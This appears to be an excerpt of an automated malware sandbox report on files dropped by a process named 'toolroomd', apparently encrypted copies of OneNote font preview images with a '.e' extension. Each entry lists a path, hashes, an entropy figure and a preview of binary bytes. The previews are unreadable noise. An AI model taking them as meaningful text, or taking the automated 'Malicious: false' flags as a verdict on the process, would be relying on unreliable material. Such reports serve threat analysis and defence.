SSDEEP:	48:EAPIxlwDZ6J6lNTewr5EpSZe5teChszVuvf/g83kq7QCo5Npq:bPIwDEyYaEpUChszsHXRUJu
MD5:	D784D3B6B4097016F51F24D137D62E53
SHA1:	B9A8D63A0D1FE024049B42DAB985E4DF532159C2
SHA-256:	124E1E20C86A02D45B000D4E4C9AC9F50036E8E1C611BFE97D8DF9A4D1EA68C2
SHA-512:	8EE11EBA27ECC99A7A60C004B99E28806377857434F74CBC3E671C7778F05A40B21798083E590060B647B113ACCC2908EBD6226FB901F9C9DF16891FA7F1CE96
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...]c._.s......;.....Z.7hRo c...$.ms...6..R.y. ..._.G.>.Z/......j\|\|...[?....;H....~....b.O..\|......K(d..c..J....c..J....c..J....4.qa.,M..........."..T.#w#BX".R.j../....u.Y..7.(..H.....z5c...y.cm_...>.JY..=....eR'..s.....^.....2+.]....J....n)..dB._....c.D.....'......f.\|...cw...J.N..K..,.:'c....Y._.`.EbR..>c34....L....m(.9..?[7....mOg..j.0{...........sn.h..#...H....]OV..NZ..^.y..RO.$....."....N....v.j.....?.ig>..4..4...=.Av..-.....<H.#..[...E.H.U...&sl.;.,..aN......-.. ..z..e.......}H....hKYj.@Z....S.V....'.$.d.I.Ac5...W;.X ..v.K..B....s..X^...,e..........do..m\...%..d....Ih#..S..L..E......}F...w.Q..2....9J&l. .o0.....%.u.F0.\....o...9.).c.L.Z....Y&$dma..8.&..\.....-wmk...+.q/.s....R.Ea...B.;..9'S.g....P[..a.G.ra......p......K.B%...p.j..<IK.!.mA......C.........sU...F...2........^.wx..U(.(......~....j...pC..!......}...L..M...FM..a...s.P.&.B..u;.r .qd.....0...h<u^.....'..=.fx.I..nZ......(!."~...$L.ae..Bi..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Iowan Old StyleRoman.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	7.672008085466878
Encrypted:	false
SSDEEP:	48:E/Y9o5y344q/ZYm3rgZVyswfGVVA2vnNpq:6co5oA/6m3QwfGVVAYu
MD5:	9C8C2FE8701AB277976865774392C4FD
SHA1:	59C8A818472E988FA6C0204664E8458837712C27
SHA-256:	872FD1288C552B62BDB9F0F6FA2CE1BB66DEA44F8820F84B3BF342E1E76177D2
SHA-512:	60723185683192CDB603EEC25F37D2D234C86037BE2AA96CE32FD31AC539C15A99E96DD2983ECDF1A1EAE407EB9F804E007EB923591A762F8D764E8411D264E3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.r.^..(1..r.i.....!o..")..w{..5.......Xr.ZE.HX..G.IUh..~...@F.jy1T....GR......+....S>...(.,..+.CV...?{...k.&....v.&....va.n].u...t{x...9.,...0.?e..B..k.v..O"........O..%.+IvWH..n.;..g ..l...jA.:....:.R,SU_T.$.R7..}KQm..../....g.?..l......Q."M,...X.os..q..)....D..A.k...S.'...Za.1j.'E.[...LkT.8.fqDHb....PV.........a.w.....s.UEc.(..n..;...%..7..{.fZ}...XIdyP.....p..Fz2...7:.j+..i...o..2$...`z .T.D.C.'5..<`......#...w...N...)a.!....7..1.$..k.b..~.GO.c.Z=...{oo~. )..G.'..U.^.f...e...8.....i......?F.n.&.V.o"e.F.....W..\|.-Nt....r........&!.rN....\|.u.<.SfZ.{.....(1..\WV..!...r..vx.q.\|...k....#//.......X../...L,.Ed'..O....r..&.t.8.S.......H@2iq8$..y.f,..$.Q.2g.1U\|r..'.Zkw.......RlM........\|}. .Y.-.G....}YU..n....M.!.."./.g.p`.h.....[....t.e...s/.l.hZg.....3.r..<.:4]..}...;.6..b.J..a;.0.J..........Q....Q...^c)......H._;q. .......-.V_=_x..K.....t...jhG..b...`...............92...S.'{..*....2.t.).....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KaiTiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	7.078346155378199
Encrypted:	false
SSDEEP:	24:EABJq4sscoJ75aqvs36bW0lu3mNfsePc0m7:EAvzx5sHH2NfNpq
MD5:	36763F08FBFD02EBA33FFA8B09804274
SHA1:	93DC89897EBFE701A7920EE10B5274311DBB9BB9
SHA-256:	D43D6135ECE4BCA08481D11A97257CFC863EAA70AB2C5D9E1C8C7D5A65E6EF69
SHA-512:	2F627AAE4384139C97FF8C8946A9FB8D4C7F4300AB471F7D7436530A99D48D99B5EAFEDE35F1A56EDD93DA4419092F0C9AB2F2163F4BE942FAB4171E443C6867
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.TC(Gv.Q....%..\Dh......L.ro..(Muq...F$CZ...HbDF.o.LX5I.+....._... ..N....@ab..mc%...i]....4.........Ue...Y..Z../..i?..iJ.k...........K.A...O@...{...z.w........A(.......bb_-.ng.a).........e..R..).....`Q........z^Z............'{.....R..7\39.....f.v..q.b_..0.ogV.....d".~.=...Ct.x.....v7.7...o11.-.<.#.{%z.'.....Z.M....A..'...^..ao.Y...O..:..m..w.C....B..B._.xC[.l.PH.yO....`...w/->.@@..f&4.l..X........f..z...7/ x....%7V~.......g.......K.../D.RC.4.....V....01+..\|@.C~.'...c2...Y.i.t.7....\|..,;..<..b.....p. ...F............'s.....YA....S..._m....-...y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KailasaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	7.3051060584265946
Encrypted:	false
SSDEEP:	24:YuP1SZw3wlMRbg5VZ54UmfRO+wO/GU1JXghKsePc0m7:YuP1S9MRc5b54n5LtGWFNpq
MD5:	319DFCD896E59312030476FC0F07FAB1
SHA1:	4F18696F2C06810D2ABEC943E2E62059ED021D4F
SHA-256:	DA7B20F2690C8754D05C63B0EE780422E8441972D9B5C8FDCB74EB30A0594779
SHA-512:	A05874CBEE4F9245DB97A7F72347C155177837774FF90F74727090704BF48D4B08AC0CF56401B50AEAB18D0C536D0F57EF0678E986F0C1F50D54EA9F7FF090DD
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a .k..+^.p....!.0e..K..r....d...#..u..)!.5...+\|\2Dk...G......{.t....F.V1.p[>.4.K...K.....^.E...b....E"s..}m............d..../......$.CLg..:...TVqs..,.....J7..Y...O...".....x.>@.2.d{.C.K...;..._z{.n..Y.....;.Tw-.`...&.....L5.J.:A.AS.JT....:...a...{..4X...m.-..@V.a.,......X..@...!..l..C...BP.5j.XB.b...P..d..u.W.q3...VU6.m..~I.G.0.T...N..U...{c.9...o.%....{V..g .}..O..fb....\.a...!.....;V..J.Uzy...Rez.Bt.1..%\..MN....._....\.9Y..}5g..p.}C!.8.p$....>{.g^B(....7.....(.u. <.k~...HA.Tf.2^...kp..U/`.L..W.......L.&.?L-,(...+....Y...^D..f.n...(..y.Y....G..</..Q...".......<...adi......2...'...qA2.....o.%.M...2...4DQ..-A._.1.m....0..>.).sen3.)...`...........?...0k.....F.....4Qb....@..0.3.0).....IW11PI..\|.+g.i....e.K^3..kr...S..._).k.8..8.Q.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kannada MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.496889872155528
Encrypted:	false
SSDEEP:	24:YuQI4xql6+oNuTP7T55HyiwkYs9TJQhMhv4jyv59NCTEJwOqwsePc0m7:YuQRxquuL7miwkYqrhvjv594KwOqwNpq
MD5:	437142D6FF8E0358EE187E5FEA7BFF4C
SHA1:	DEDD933E97C13C324EB979595BFCD87E7DDC3936
SHA-256:	92A29E0563054A04DB73E529C14BD558265EA05A1125C125C8560DE3050B20FA
SHA-512:	4B831E7BA6E84F1AAAFDB9971A43FB2138C90E3CEEF1BDD33D1AECA7BE56293C9EAF8B86E48D947B5B057CCEF3F165B685498B6C3E47B107099987AD285F9C7E
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...uY...`uK}.e...N.....].I..2.&.Yf.....J....4..+...Z.a.......H.y].\...J_/.'.U/.E....Fv........>..D..{.....Yj./..i3^.C.6.(.Q. .,...".h+D.y.#.).../Sm`..4.a....b.La.u..U......j?g..:.v....C.3!...'...\|y......i...Q.x....`ll1.H...q.kg@..K..<f.5..h.n....}.L....9..g9.(.'.!.JKg.=..K.:.....=..Z.]....x.......,sI.A..n..Qxb.9...lZ.....k...I$.....5..>;.t4.8F.4.9.u....%....e...#.t.P..,+.~......._...Z. ]F%..[...7/1b.ix.g.}j..fS...<+.._..0.]....._...J&......-._...R.G..9.qf..;{.c;...x.o...e..'F3.nj.Tf.....g....e...1.f.....@Z.#...g{r.7... .X.....2...%.&.9...z.:........).u;.@.$.5u......}...>P..Q.q.^_t...L.Mv......@I.?..C~.{N!..........'...d'.;....bA..-$.P..d........DIQ&....]]a..<.I..s...k..q..\|...8...0[C~..../.G......sWL@c.bg+.3T...........,...iW.$8..M....wvy6..8.9o>R.hr7.....M.....z.......PJC ....[..o.E.\..;..i.G..aw..`.......y..*...~;......4.BX#.D4..E.m...g....m..1.6!Ki.H.U<yH..C{..r.pkL.1.$H... ...2&

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kannada Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	7.659237894756829
Encrypted:	false
SSDEEP:	48:+P87lYV0I02RF53SrwDnlUl0BQHUEU2X1gNpq:++8F53hDOl0BEUru
MD5:	8A64F6B9262300C7D1F98B6E28A00F82
SHA1:	7848CC74E41AA50D109FD983C47E6BA9C11CCD4F
SHA-256:	9658B81B90629D4B423AAD46A2BED3ED298D2C074F77C2B4ADE0D785D0D3F0A6
SHA-512:	53FAEA146C74EA57BAA880E6AEDA4257846F14E96D82F06D7B5133F6EB404F3C771E76AAED4A5A64FA96071CE4F8F6D9AEB9B119F685CBF2FC82EB05E804123A
Malicious:	false
Preview:	.<.\|.....f.A..1...N#. ..\.L.@..4-F+`..i .Y.a.{.H#.....BD...W;&...>..4.9.2'..\.....m.......w$.^....].Qm.?....I..o....k..Yi2....q.....'V..[.1..<......U.I."...U.I."...U.I."...U.I."...)S....a.&.z.....M..]mL..8).'"q....2...L.r.........RJi./.60/.e..h.....!..,..q.uebB.h.K..[`.$.....7.EV...^..+8;.].$,.".....P.%.Z.........^.7s......H.e9L..1m.GZL.5.R..[C.Oo..<..oOHf?.p.."$&...%g......B...2:0.A.:..%.9Ed..in.(...,.(.-:._-..Q.s..C.:(i.hL.^.GOr.......8H..J.......#.M......pVM..}.d........tD\zr..*......Xp....V...oh..M.%.9.ZK.y..a-._...p..9..\|<a..!q..ic.f...9d.h.q.q}..;':./Tw..U..b.]..g.5...Zl.:...G...[..A.A!.?.\|e.5=%..5~.+.a29.\|...............V.Q}X.r,U..P..6.....z. M.~.q..3..k.L..uk..T...=..lX3.?..pvlA.v..W.....P...\.....fG....44...J.!.....F_G;...=`....D/..gtti^...3..V...x.A..$.3:l....RQ.K..Ogpr.....)..@.T..J.....p...Yq8.8h.1.X......[6.r.b.U....5..Nl.be.w?..........Xp)X..4...(.?.T5..8.._'.....[W..j...pSO..v./v.'"p.c....g....&D..X..5T..\|.9....k.N..'q1..k......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KartikaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1162
Entropy (8bit):	7.2565026903288805
Encrypted:	false
SSDEEP:	24:EzOrcDCa2inFujK/nrrt61OY0TSofhWZfvsAkNpsePc0m7:EzOrcDy1jOrIkBStZnsAknNpq
MD5:	4B682579757D121E338E41F9A1A9DFFB
SHA1:	57C450E38E9E528E52BE7A7EE3793D95CD060516
SHA-256:	FD518F8531EE0FA9660DE79C360107D0E86B1AFA24A68423E14A6EFC5D45F6E5
SHA-512:	48B1BCBB97A31803D1751A0E0CF0CB1ED5F65215D7C26F0061C555945F5B552BD6E435001FC49DE2324A6706DA4EA3D461416DC6A377F8E4C24083D790119286
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a+Gb...p:..c%Er.E.)$c..$..T^.zM.p..Z...D...=...Y.O.t..NX..'...wJ...'..d$..C.g\..jb.<..e...{X.........R.n.C..H...\.e8.....}.P`...;.>..Qa...x..K....t..Q. ....x{be...-..._....R.7B.c.....!B..L"9}.F..A.I....S.......p.Q._.....!...0)o..n.......k.".MMe<c.:.Z..#U.k1yF}..;y.xR..8RFb;.'\|...4...:....r....y.}.........vGv....1......'sA.h?[.qcG...=.V.y.x....>....hq.N.....4........:.....v.q.....l.......^........j..,.k......II.7..R.]..?c.x...{...#R..1.../.bh.D.QZ..X\|;j...:.j^a...di...8..@.P..W..(. W@M......../\|.W.x..o........1...#......V..@.Wq..w[..M..F.0S.8...n.N.2J.!e+..^Va...6..x..&..j.n...0.-...uj......kc,..;......Ae.....L...7..d'2.?.j.!...7...w..w....ir.K..fp.s.l.=.w.?.@.<?.!!h.n{.A...<:.1....Sx.N.....r.7...\.<.A....K}.&.^r..0.%..q'.M...:..R9........bi.Z.8.....Y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KefaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.236064025315289
Encrypted:	false
SSDEEP:	12:WvyOSYKQravkou1nN5fZS8eL28xDS8hplvz7IoDzGF3bbbtdOZEL7TsewLYTc+qf:ESYjGvk3NvMvx1vnn2bbpzsePc0m7
MD5:	23A16360BDD72E306FBF7DE5EE51750B
SHA1:	2FE8F50FA1EE982F9C8D8AA2276FA4924E8B7230
SHA-256:	F5A13D4C2A9224C071448FD2B0F94820F08F80D7416CE840C64D4491C3E349D6
SHA-512:	76100E5F75975A2D0964707F43D680910D1459DCC2AD366E6577E227D0E00BCA6F90AE9B01157E1F76A3DC5840419F69F89C02AAF88D658C8F62F6F649764183
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.v........:(...m..Ytt.......8a.M..d.B..+...%..dk.p..R..h`..oZ.....>..........$.p.`G..@..h.N:..6G.0......l...9$../&n.x....o=.d....T....!.........[.:..M...................+....n^...R.{OP..N......e..C.;>se......{.p...a.._.E.Y.U$.....G..W.DO....+.X.E#\|.. Hn,....v...V..b.%.U./...eg...Oo.W..c.........E.r._....n......@.n..t..q.....^.NvJ..y[.G.\.Ut..............e'#....Yot...`..f..o...Z.ohuH.:...<.?b"...7.......S....`..CUy.x.Zf.8.uP..HF....]...3...4.fM.d...I.....k.......I.4....,p-=....'...b....(Q..d...sc.u..^E.<.3w..-....h.......S.....i).Nb...nKq..E.JpzK...k.Z..w?......m..T.D.J..D.f....c..X.j..N:..6G.?P..z..rW2...k./..J.\-..S...}...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Khmer MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1194
Entropy (8bit):	7.332985439110494
Encrypted:	false
SSDEEP:	24:CeoJP+yhnpnUx4TxtfoFFPRyBLzq+86yryfLjxMGsePc0m7:CzsEpnUwpsFsBXo4BVNpq
MD5:	013914E5EA145418B017C76D8BDFF6EF
SHA1:	42F1D287CF6A9B06383C3CAC17FAB0A0517F6251
SHA-256:	6F8E264DCC9D41274E959C79246E775538D4E6ECD9E2835B6F3F65677CCE79F9
SHA-512:	AFA3E2E53567C82F8117A91BB08B72B9857B95D50D6463A51B14DCEF6D1F78835B59D0D611A501EE78A4F6E3001B4F1E1A7861295B06ED25664F3DFFEF73A2F3
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a.q...."....&....[NB.e..$CF..c..&.yn.j...S63.mmb....SV..1y.NVT.T`x.........t,.^(..c[R_.:.8{._u..m.J.;7...k.....U......J.;7...Z.^..0..Jf...)2../...+..z..c...(...3m.(..E....i..ijO...b..'u.....&..."8........v.&..........H....]........i.3..U...k......tp4.~.,N..B].t..>`.+X.[^....x!.R....%u.+./....XI......4.$[..}x....P+.......~....F..O...b'..r..Nr..(..V$.&...!..>G.y.8...m...%.;....;....dr..O...A...."....-.....$..f...G.fxs#..I..B...2y....jS....;.z..:..vAO..$.....M.5M.EW.....+..l..?k.8.Z..r.i....v}.{.>.5.ey'.`......._.q@^...a....=H.bm.......ZnLT..T....h.c....@....a0=.....(.~S..K....\|..6Z.}(.6._..a65../..2..L....c...G....;.t.E]t..Q.x_.3......^..9.$.s.....).............a<u.:.....[Qj........j-Y..O^$.K.P.T.:.8.P&..pb}.1..r..@...j..i1M.hN......>....."s..}m..8...D4..aLAqx....J.\-.S...s...y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Khmer Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1866
Entropy (8bit):	7.6101018926652895
Encrypted:	false
SSDEEP:	24:7jPbmrqAVMQJE8H7ySyi2oeIelbwXpSsslZNPx01hGQNYOfkFrLWtJromhsePc0q:7jbwk8ByeeIms+PxQhGiZMFrL+VhNpq
MD5:	28CF2CA3C8B4AD80215990B04EABA4E3
SHA1:	BB91870112E90393AC4DB8805DA4DF2A4CBF9AFC
SHA-256:	45B031F6CFA5CF911FA4196D34CBA56598178D7D54288E5B1CE5A563A7B79CD1
SHA-512:	65A4C14D5CC10912FC05DE50827D001B5A127E5F6C99845C3447B9FD2ADCEC7AF25E66F656AD077CDCFCF3DD70E19B3D593A2CFCB3984B0A3D3E347992D83BA2
Malicious:	false
Preview:	.<.\|.....f.A....g.$.e{.VM...J.d=.!...i .Y.a..?tu...^^..\|V.....(..~.a..F>.(%5Q..A/1..C......;7.....jj.9i\{.M.k..r..\.....z....5..c]Jx...'5;...W[..;-........):g...W_.....j....vD.&...j.$Za<..W3.=P.L.kW.o6........O..z.Ot.iz..'.g.....+.".(.......1.c..y..VrI...UaR.t..1...Y..Z^L....).;>-.a.k..2a....] ...;.].x.....ea.%......c.9.`20PN..;i.IR.g..AKEn.Q.$.C.a..n..N..&.~.0..?r........fy.eBb..9...s......_+.....J...'a......G...H........r2..U..%.. .].\..LO../..EX.g...lp6..f.0[\|..B.T`....*.P..g.6.....E?B..../...<$L..S..... ...Vc.j...h.#.&..{..3.ef.F...,+Je.n....^..t.;..K..U..[..S.d..r..BIC.z..l..r@..,.p&.9.E..(..mo.m.cb.U. ....&#..E.:....."].U<...mg.L..(.%I.....%-...i..z.x..(?^3&.u.U.;.P1'.......8..Fd..Lm.K..f4...x....l+].z~..Q..J.M..G.sZ..@Jc..8"kP.O7-4...@...^..k=;....>9K..w....@OX.....M9p..q..........&.8Vv.U.eJ....!.n.;MR.D.&l.........Nv-.F..?9...y.08..3.H.......X...J1...t..Hn...\|u.C...D...3......8b..g\|T.q7..?#.0..3d..,...X.f..j..%.$L;.0W...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor BanglaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.579866409466355
Encrypted:	false
SSDEEP:	48:EJkG4tRZR2HArLPufYabEfjPYe0Cs+0sZKNpq:hHtLHHQREhJs+0scu
MD5:	2C5B4254269722F3BE4659B2F36A4D74
SHA1:	ECBEA4F469B3586827BBBB9A0EF6C22CD027B780
SHA-256:	81846F3EE694FBDF045A370B89AB1E73F93B9A76636503C60683A829FE26FB36
SHA-512:	C647CDFECE1B48794776CF206D842071534D2F773BF91ECFAD3077AFE46360437FD38E121F3ACA812866CFCE093BE316EC11FF509E320C3DB71EC30C5F65405B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...$...'.8.9....b..:\|.....<.n#P.... .F.?k....&.$......iZ...S.q..;..v.V...gg....A.\|..h.`.XA'.Ha..O'.....2\|.#...........U.I."...U.I."u.U.:..7B2..`....z`k....V..X.q=L.......lX.{....Mr.]GI...'.........D....O.D.cBN.......D.Hh[afF.s.L...G.ISD..#&......3.Ma.(!.Y..Y...H.....'[.2..f.Y./.RI.....u..].K\]c^..(.....f.I.Q.1..^=.{....9.......&h1..J...h.4...>......3.a../D.f.8RI..Q.J\P.$..jRV=@)#TH.Jei.b@o.;...0....?... _.'2.....u....J../..,jy2.N...,...znl..J8.T.D..Xy.o.......;..9.{n......X^...x.W...kv[.O.O.<...<.'..JHLf-.r...}.S3....]..v.\|...E`..4.!...y..>+u...h.N.......1....=0K..U'Y.F...........(......vh..>Y..U.0..........V. ....#./co.FR..<0...Ji.%......5.t]s...g..........L.fnj.z...W.......(..`CS]..r.....0......H.D.....s........f........t.C.}.B.!.D..;.o..!..]..\|....2}.7..h...d'V{..z..\|s.>..hwm..O.$05...4.qA...y......w...(.x...s....y...R..y^.........w.Df}...p.......g...'q.o......e...q...`....o....D..Z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor DevanagariRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.6442110299367
Encrypted:	false
SSDEEP:	48:EfBvTyBeAriDj4zlIxvbj87eMkbNDJrVGdPdcnGm6N1zHNpq:mBvTyBeOiX4ztKhJxGd6nirru
MD5:	87CB7B4C0D084545CFC66342EF8F52C7
SHA1:	7A4F0BC136271BBB65F726FC081A2ADBD297AB90
SHA-256:	35D7585FF4F569B6E00A4D7C86A23554706D4117C6F47E93A03AC40B614C726F
SHA-512:	46357FF9AF156B6E3087F8C1EF30ABF6EC5DAD66ADCC2A5F36F7D52F6A0A51406B4FA8A46023D81E5C2693D514E62F24C8BA608CFF4E25CA18ECB0C823255132
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..]....w...2K..:S..d...h,..#.,..<.#.q.1sX..i,n...Vk.;2.l...\|..y..,....Tf.".W..........6.Y..I..w..[...".Em.:................>I.dj..N.r.!.....h...>.U..~+W.y8.xE.+.....W..N?%.?..........wj.....NU....-....L..._.[.g[ nwT.`./.8....T.......Gk...e...j.o..b..O..x."..[d..G....m.....d....N?...._5n.y...W...._. .A8.ocF...zSQ y~.?f.".l.v.V...%.E..#..6V.....7%.AD..x.......(.?...L...}.8.....5.lB.P.ryu.....H#.........C.. .......&/.~..X.7..r$.D....t.1.G....Q........$..< &...... ge<q...ai....~.....jd.M.~5.K.k..Kl..~.9..1..79.7..iN..N...ZyC@..T.{........o..u.A[.Re.qh..$I.b...z~.Y=].~2%.oc..._..sbqy.........iX3b...1.XY.)..r.Mq......03...+A..`......o`kv..<.mA....Y.f.@\..E......K...z...:,...c.r%..}.V......."....1n..e:.{..x.5;-..1UK....d ...%?.._}&n.........G.Uw.j.il]e$.\|..@.....7..E..Z..)...E..X"....).c.o....~N"..}.lT..l#B&F{.G.6..-.:.u.Y!;.j...w..+M@.i..a..b.@..1..E.c(..R........3.3.z.D+z......q.../..M..&O.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Kohinoor TeluguRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.528016226731654
Encrypted:	false
SSDEEP:	24:E++NPdVbjHWJKYQsaok5W3Cvaa6v30Gx7DKIUb3dxHZD47/kWQsePc0m7:Ev3VXHytsASvLENx7DKIUzdxHEshNpq
MD5:	87ECEDD81DEDC15EC676237BBE6ADE5A
SHA1:	BFD70D9338BE97B90525D7D7EDA821F30B376174
SHA-256:	675BC39DF3C15A8D4E0BEA482D8F06B9CBC8C99D87C7FC0568DDA156209A025E
SHA-512:	1BDA4AD1C94A1382719575DA5658EF12B01818EEA3ABE3A7817FE12A1CCB283953D3F117254DFA19A53F0C72872A01D4CB7D8DCE13D1F91AF39D66C36C95EFBC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..........0....9C)....X_.XD.<~\|..I,....w.\......_.....2>.Am.E.$.^.......hH3eF....v..g.......8.......dFyb..H..g.h.......b..[.C..O......:BZ..;...NU.\...$-/].+.>..3.W`.....5.F....P].....8.B.[..Vs.....-.F.4.K.b...3=.O...A;.F....q..3..c..i.X<..\H6.W.]l.....Oji'.Y ;...K..FezZ1..u+..J...S....y...c..I;F...q^.L.O..~ /.d.R.y..p\.2-.g\|..A.....A.!..E..y....p..N.......>1.L6H..........Z.....-......sE..F....Jr..?.`k.;..x,W..C...:G&. .4.I.<&.i7j.d...h..o..[.nBN..d!../.cV...h..m.a..s...FC.[....=..>@.L...XT~.p..:=..@D.8......t.ed.."?z.L..!7/.A..>...6.IL"...!.5..............[..xa.zc?...}.(.. ...Ga.uL...$w`..P....F.E....F..s...G....r.3..?..".@...!. ..h.EleUK[.~\\|x.....Q/.....9fOd.]S..EF.#{.......s39?.=......-H^...U.3.#.I#...z..........h.?..b.cS....f).j.sF.s3...&{.@...u.q=lR...K.....3.q.o.c!..;.^....ET.Lucu.s._............bq..j'..... ....U...?..`t.bm.d....0.y.Q.....2L=y..SIG.9%...E..V.1/.P.j

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KokonorRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1194
Entropy (8bit):	7.323818661801932
Encrypted:	false
SSDEEP:	24:biFgUwOa7lywjwkWOEXaUdWEOBvhKWmGFVzWsePc0m7:biFxmywjxWNqUdnmKo7yNpq
MD5:	AC0D46335A644FCD8EFA8A1CB1B10F84
SHA1:	A171C392C4DFAB928B2B1A6A0FD039BB09265F63
SHA-256:	DCFAFE4DD933790CAD2075D9BEEA4ED05B13758D5323BB6E45B0A4C5C0D17D71
SHA-512:	8D80410428C3B2C56711FB06D2A2EA6BC50254771AD523DFEF27FAD5929F8C89FEB6A2AFA03F050ACBDBA3FFA720CECB6E28D3B20169ACAFE6C5A59D670E34BD
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a..aF.-.K..8...x./.......X.7...aD.R.aZ..?\....d.\......w.@..._.p.L......L....F.......9.....4.r..Quw..f...@..i.#Y'za.(V...v./......D.l.Q.G7..F.(.%........H?.nD...3.K..>\O.hQ...j...z.....(.l.X...ur...m....>6a.v1..h..O...=l........h.@....\| .<...D<....\...`a...JYn.g..Uk../o...C.....Sd8J....!P.7.<.Mb.R80.....^X..@QS..(...s}.......8....?.}.CfD.'{.."x=...-B.O..3\|...~.-..O.Q..._.Z..i.KO!s.O...F"J.6.?S..I.CJS..I.......{.....~.^....sn.8#q:. ..iY..{.X.........,.nf..S..Z..6J..Wf...q..Yu..E`"..U..#.p..#Ob..c..fDngR..su.d{...i.[..{m.X....J.-.J........at.M.).d........2.d.^....b.K.. .........B6..-......R....U....[-.....;.......H..xO3.....9....r..{.J)&.vt%.FWT.[Q.B4...uV..3oD.............@..im-........".W....d..e..e....I.......K3_nl.VNA.....Quw..f..BgqJ..#_.f..zv.!0.>..l.F....8...Z7.E\.:3.q.o.c!.y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.KrungthepRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1418
Entropy (8bit):	7.458165216915127
Encrypted:	false
